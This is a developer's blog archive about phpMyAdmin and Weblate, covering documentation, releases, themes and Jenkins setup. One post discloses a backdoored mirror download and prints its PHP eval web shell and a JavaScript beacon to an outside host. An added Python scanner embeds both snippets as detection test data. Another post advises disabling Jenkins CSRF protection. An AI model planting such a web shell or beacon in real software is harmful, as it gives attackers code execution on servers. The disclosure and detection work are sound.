Michal Čihař - Blog Archives for phpMyAdmin

New documentation for phpMyAdmin

I had been quite unhappy with the shape of our documentation for some time, but this week I finally found time to dig deeper into converting it into something more usable.

Nowadays I mostly use Sphinx for writing documentation, which makes it easy to write in RST and produces output in various formats. Together with the Read the Docs service, it makes a great combo for providing user documentation, which I use, for example, for Weblate.

So with a little bit of magic in Python and Beautiful Soup I was able to convert most of the HTML documentation into RST without tons of manual work. The resulting source (and ugly conversion script) temporarily lives on my GitHub and the generated documentation is available on Read the Docs.

There are of course still many things to improve, but I think even right now it is easier to navigate than the previous monolithic HTML file.

Now we need to decide if and how to integrate this into the official repositories, and I can then continue improving the documentation content.

Weblate 1.3 on l10n.cihar.com

As the Weblate release is getting closer, I've decided to give the new version more testing in real life, and it got deployed at http://l10n.cihar.com/.

This release brings quite a lot of new features; the most interesting for users might be:

  • Better and new consistency checking.
  • Better support for Android resources.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.

You can see the full list of changes in our documentation.

As usual, I hope this upgrade will go smoothly and won't cause any big problems :-).

New phpMyAdmin theme

Today, I've finally found time to process new themes for phpMyAdmin. The result is two theme releases.

The first one was just a minor update to an older theme (Darkblue/orange 2.11), which fixed behavior in Internet Explorer.

The second one was a completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually the first contributed theme compatible with the 3.5 series.

Of course you can find all of these on our themes page.

Compromised SourceForge mirror

Yesterday, the phpMyAdmin security team was notified about a backdoor being distributed together with the phpMyAdmin zip file on one of the SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in the phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code: there was a file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, JavaScript code has been included, which could allow an attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all, it looks like a simple but quite effective way to install a backdoor, had they been able to spread it more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spotted quite fast (looking at the domain used, the exploit could not have been alive before 22nd September 2012) and not on a very frequently used mirror (based on the official SourceForge statement, about 400 users have downloaded the file with the backdoor).

What still remains unclear is whether this was really targeted only at phpMyAdmin, or whether there were more modified files on this mirror (SourceForge hosts thousands of projects). I randomly tried a few of our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do a more systematic analysis, so this question can now be answered only by SourceForge.
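
Anyone who still has a copy of a downloaded archive can check it for the three artefacts described in this post: the server_sync.php file, eval called on request data, and the image host contacted by the injected JavaScript. The following Python example is added here and is not code from phpMyAdmin or from the original post; the function names, the sample archive and the JavaScript file name in it are constructed for illustration.

```python
import io
import re
import zipfile

# Indicators taken from the post: the dropped file name, eval() on request
# data, and the host contacted by the injected JavaScript.
BACKDOOR_NAME = "server_sync.php"
BEACON_HOST = b"logos.phpmyadmin-images.net"
# eval() fed directly from a request superglobal, tolerant of spacing and case.
EVAL_REQUEST = re.compile(
    rb"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE)


def scan_archive(zip_bytes):
    """Return sorted (member, reason) findings for a release zip."""
    findings = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            base = name.rsplit("/", 1)[-1].lower()
            if base == BACKDOOR_NAME:
                findings.add((name, "backdoor-filename"))
            data = zf.read(info)
            if base.endswith((".php", ".inc")) and EVAL_REQUEST.search(data):
                findings.add((name, "eval-on-request-data"))
            if BEACON_HOST in data:
                findings.add((name, "beacon-host"))
    return sorted(findings)


def build_sample():
    """Constructed archive: one clean file plus the two snippets quoted above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pma/index.php", "<?php echo 'ok';")
        zf.writestr("pma/server_sync.php", "<?php @eval($_POST['c']);?>")
        # The JavaScript file name is a placeholder, not taken from the post.
        zf.writestr("pma/js/example.js",
                    'icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";')
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in scan_archive(build_sample()):
        print(f"{reason:22} {member}")
```

A hit on any of the three reasons means the copy should be treated as the tampered one; an empty result only says these specific indicators are absent.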

Sponsoring phpMyAdmin

We've decided to accept sponsorships of phpMyAdmin in a more official way. So if you or your company want to financially support this software, you now have a great chance to do that.

From time to time we've received offers of sponsorship, but we never got to the point where we could easily handle them. In the past we were limited by the sf.net requirement for no advertisement on the website, but it got leveraged over the time and we did not change our policy much.

For now the only benefit we are providing to our sponsors (besides the good feeling that they are supporting a good project) is a logo and link on our website. In the future we might add some more, but at first we want to see how it works at this scale.

Anyway, if you are interested in sponsoring phpMyAdmin, you can do that on our website.

Triggering Jenkins from GitHub

For some time I thought it was not effective to use polling to get the latest changes from GitHub into Jenkins, which we use for continuous integration, but I was always too lazy to investigate.

Today I finally took a look at it and it turns out to be quite easy:

  1. Enable the GitHub plugin in Jenkins.
  2. Enable "Build when a change is pushed to GitHub" in the project configuration in Jenkins.
  3. Disable "Prevent Cross Site Request Forgery exploits" in the Jenkins configuration (to prevent bug JENKINS-10263).
  4. Configure the Jenkins service hook in GitHub to trigger your server (the URL is http://<jenkins>/github-webhook/).

Try testing the hook and check the "GitHub Hook Log" in Jenkins to see whether it really works, and you're done.

So now, phpMyAdmin's tests should start as soon as somebody pushes changes to GitHub.

GSoC evaluations submitted

Even though I had planned to do this on Monday, it somehow slipped to Wednesday, but I've finally filled in the GSoC 2012 evaluations for all students I mentor at phpMyAdmin.

Generally all of them perform quite well, but there is always room for improvement :-).

The greatest pain every year is filling in evaluations for several students - each of them starts with the same questions for the mentor (e.g. how many GSoCs you participated in or how much time you spend on GSoC). I know I can copy and paste the answers, but this still looks like something unnecessary. Also, some of the information is probably already known to Google (e.g. in which years I participated in GSoC).

Weblate 1.1

Pretty much on schedule, Weblate 1.1 has been released today. It comes with translation updates, bug fixes, improvements in working with Git repositories and brings support for offloading indexing.

Full list of changes for 1.1:

  • Improved several translations.
  • Better validation while creating subproject.
  • Added support for shared git repositories across subprojects.
  • Do not necessarily commit on every attempt to pull remote repo.
  • Added support for offloading indexing.

You can find more information about Weblate on its website; the code is hosted on GitHub. If you are curious how it looks, you can try it out on the demo server. You can log in there with the demo account using the demo password or register your own user. Ready-to-run appliances can be found in SUSE Studio Gallery.

Weblate is also being used at https://l10n.cihar.com/ as the official translation service for phpMyAdmin, Gammu, Weblate itself and others.

If you are a free software project which would like to use Weblate, I'm happy to help you with the setup or even host Weblate for you (this will be decided case by case as my hosting space is limited).

Update: The Weblate appliance has now also been updated to 1.1.

Preview of Weblate 1.1

The upcoming Weblate 1.1 is now installed on both http://demo.weblate.org and http://l10n.cihar.com. The release is almost ready (I plan to add only one minor feature) and this setup was done to get more testing in a real-life setup before making the actual release.

As you can see from the list of changes, there are no big changes from the user's point of view. In case indexing offloading is enabled (which is the case for l10n.cihar.com), the interface should respond more quickly while translating (and not produce errors in some setups). The rest of the changes are even more hidden, like smarter handling of merges and commits (there is still room for improvement here) or better validation of admin forms.

Anyway, I hope to complete the missing features and do possible bug fixes in the first two weeks of July, and you can expect 1.1 to be released around Friday 13th.

Weblate - over 20000 translations in 3 months

Today, I wondered how many translations have been done using Weblate since it was born. Of course I can give numbers only for the services I maintain, the biggest one being the translation server for phpMyAdmin, Gammu and Weblate.

Looking at the logs, the server l10n.cihar.com helped to contribute over 20000 translations (actually a little bit more, as only changes after the release of Weblate 0.8 are tracked), which is quite an impressive number. Of course the biggest amount of contributions came at the time of preparing the phpMyAdmin 3.5.0 release, when I gave it a huge amount of publicity (AKA spamming my blog), but the number of people accessing the website has still been growing since then (though the number of submitted translations is slightly lower).

Now, as the 1.0 release proved to be quite stable, it's time to focus on 1.1 development, which will bring offloading of fulltext indexing (updating the index online proved to be unreliable for bigger sites). Almost all issues targeted for 1.1 are already fixed and all that needs to be done is testing in real-life situations.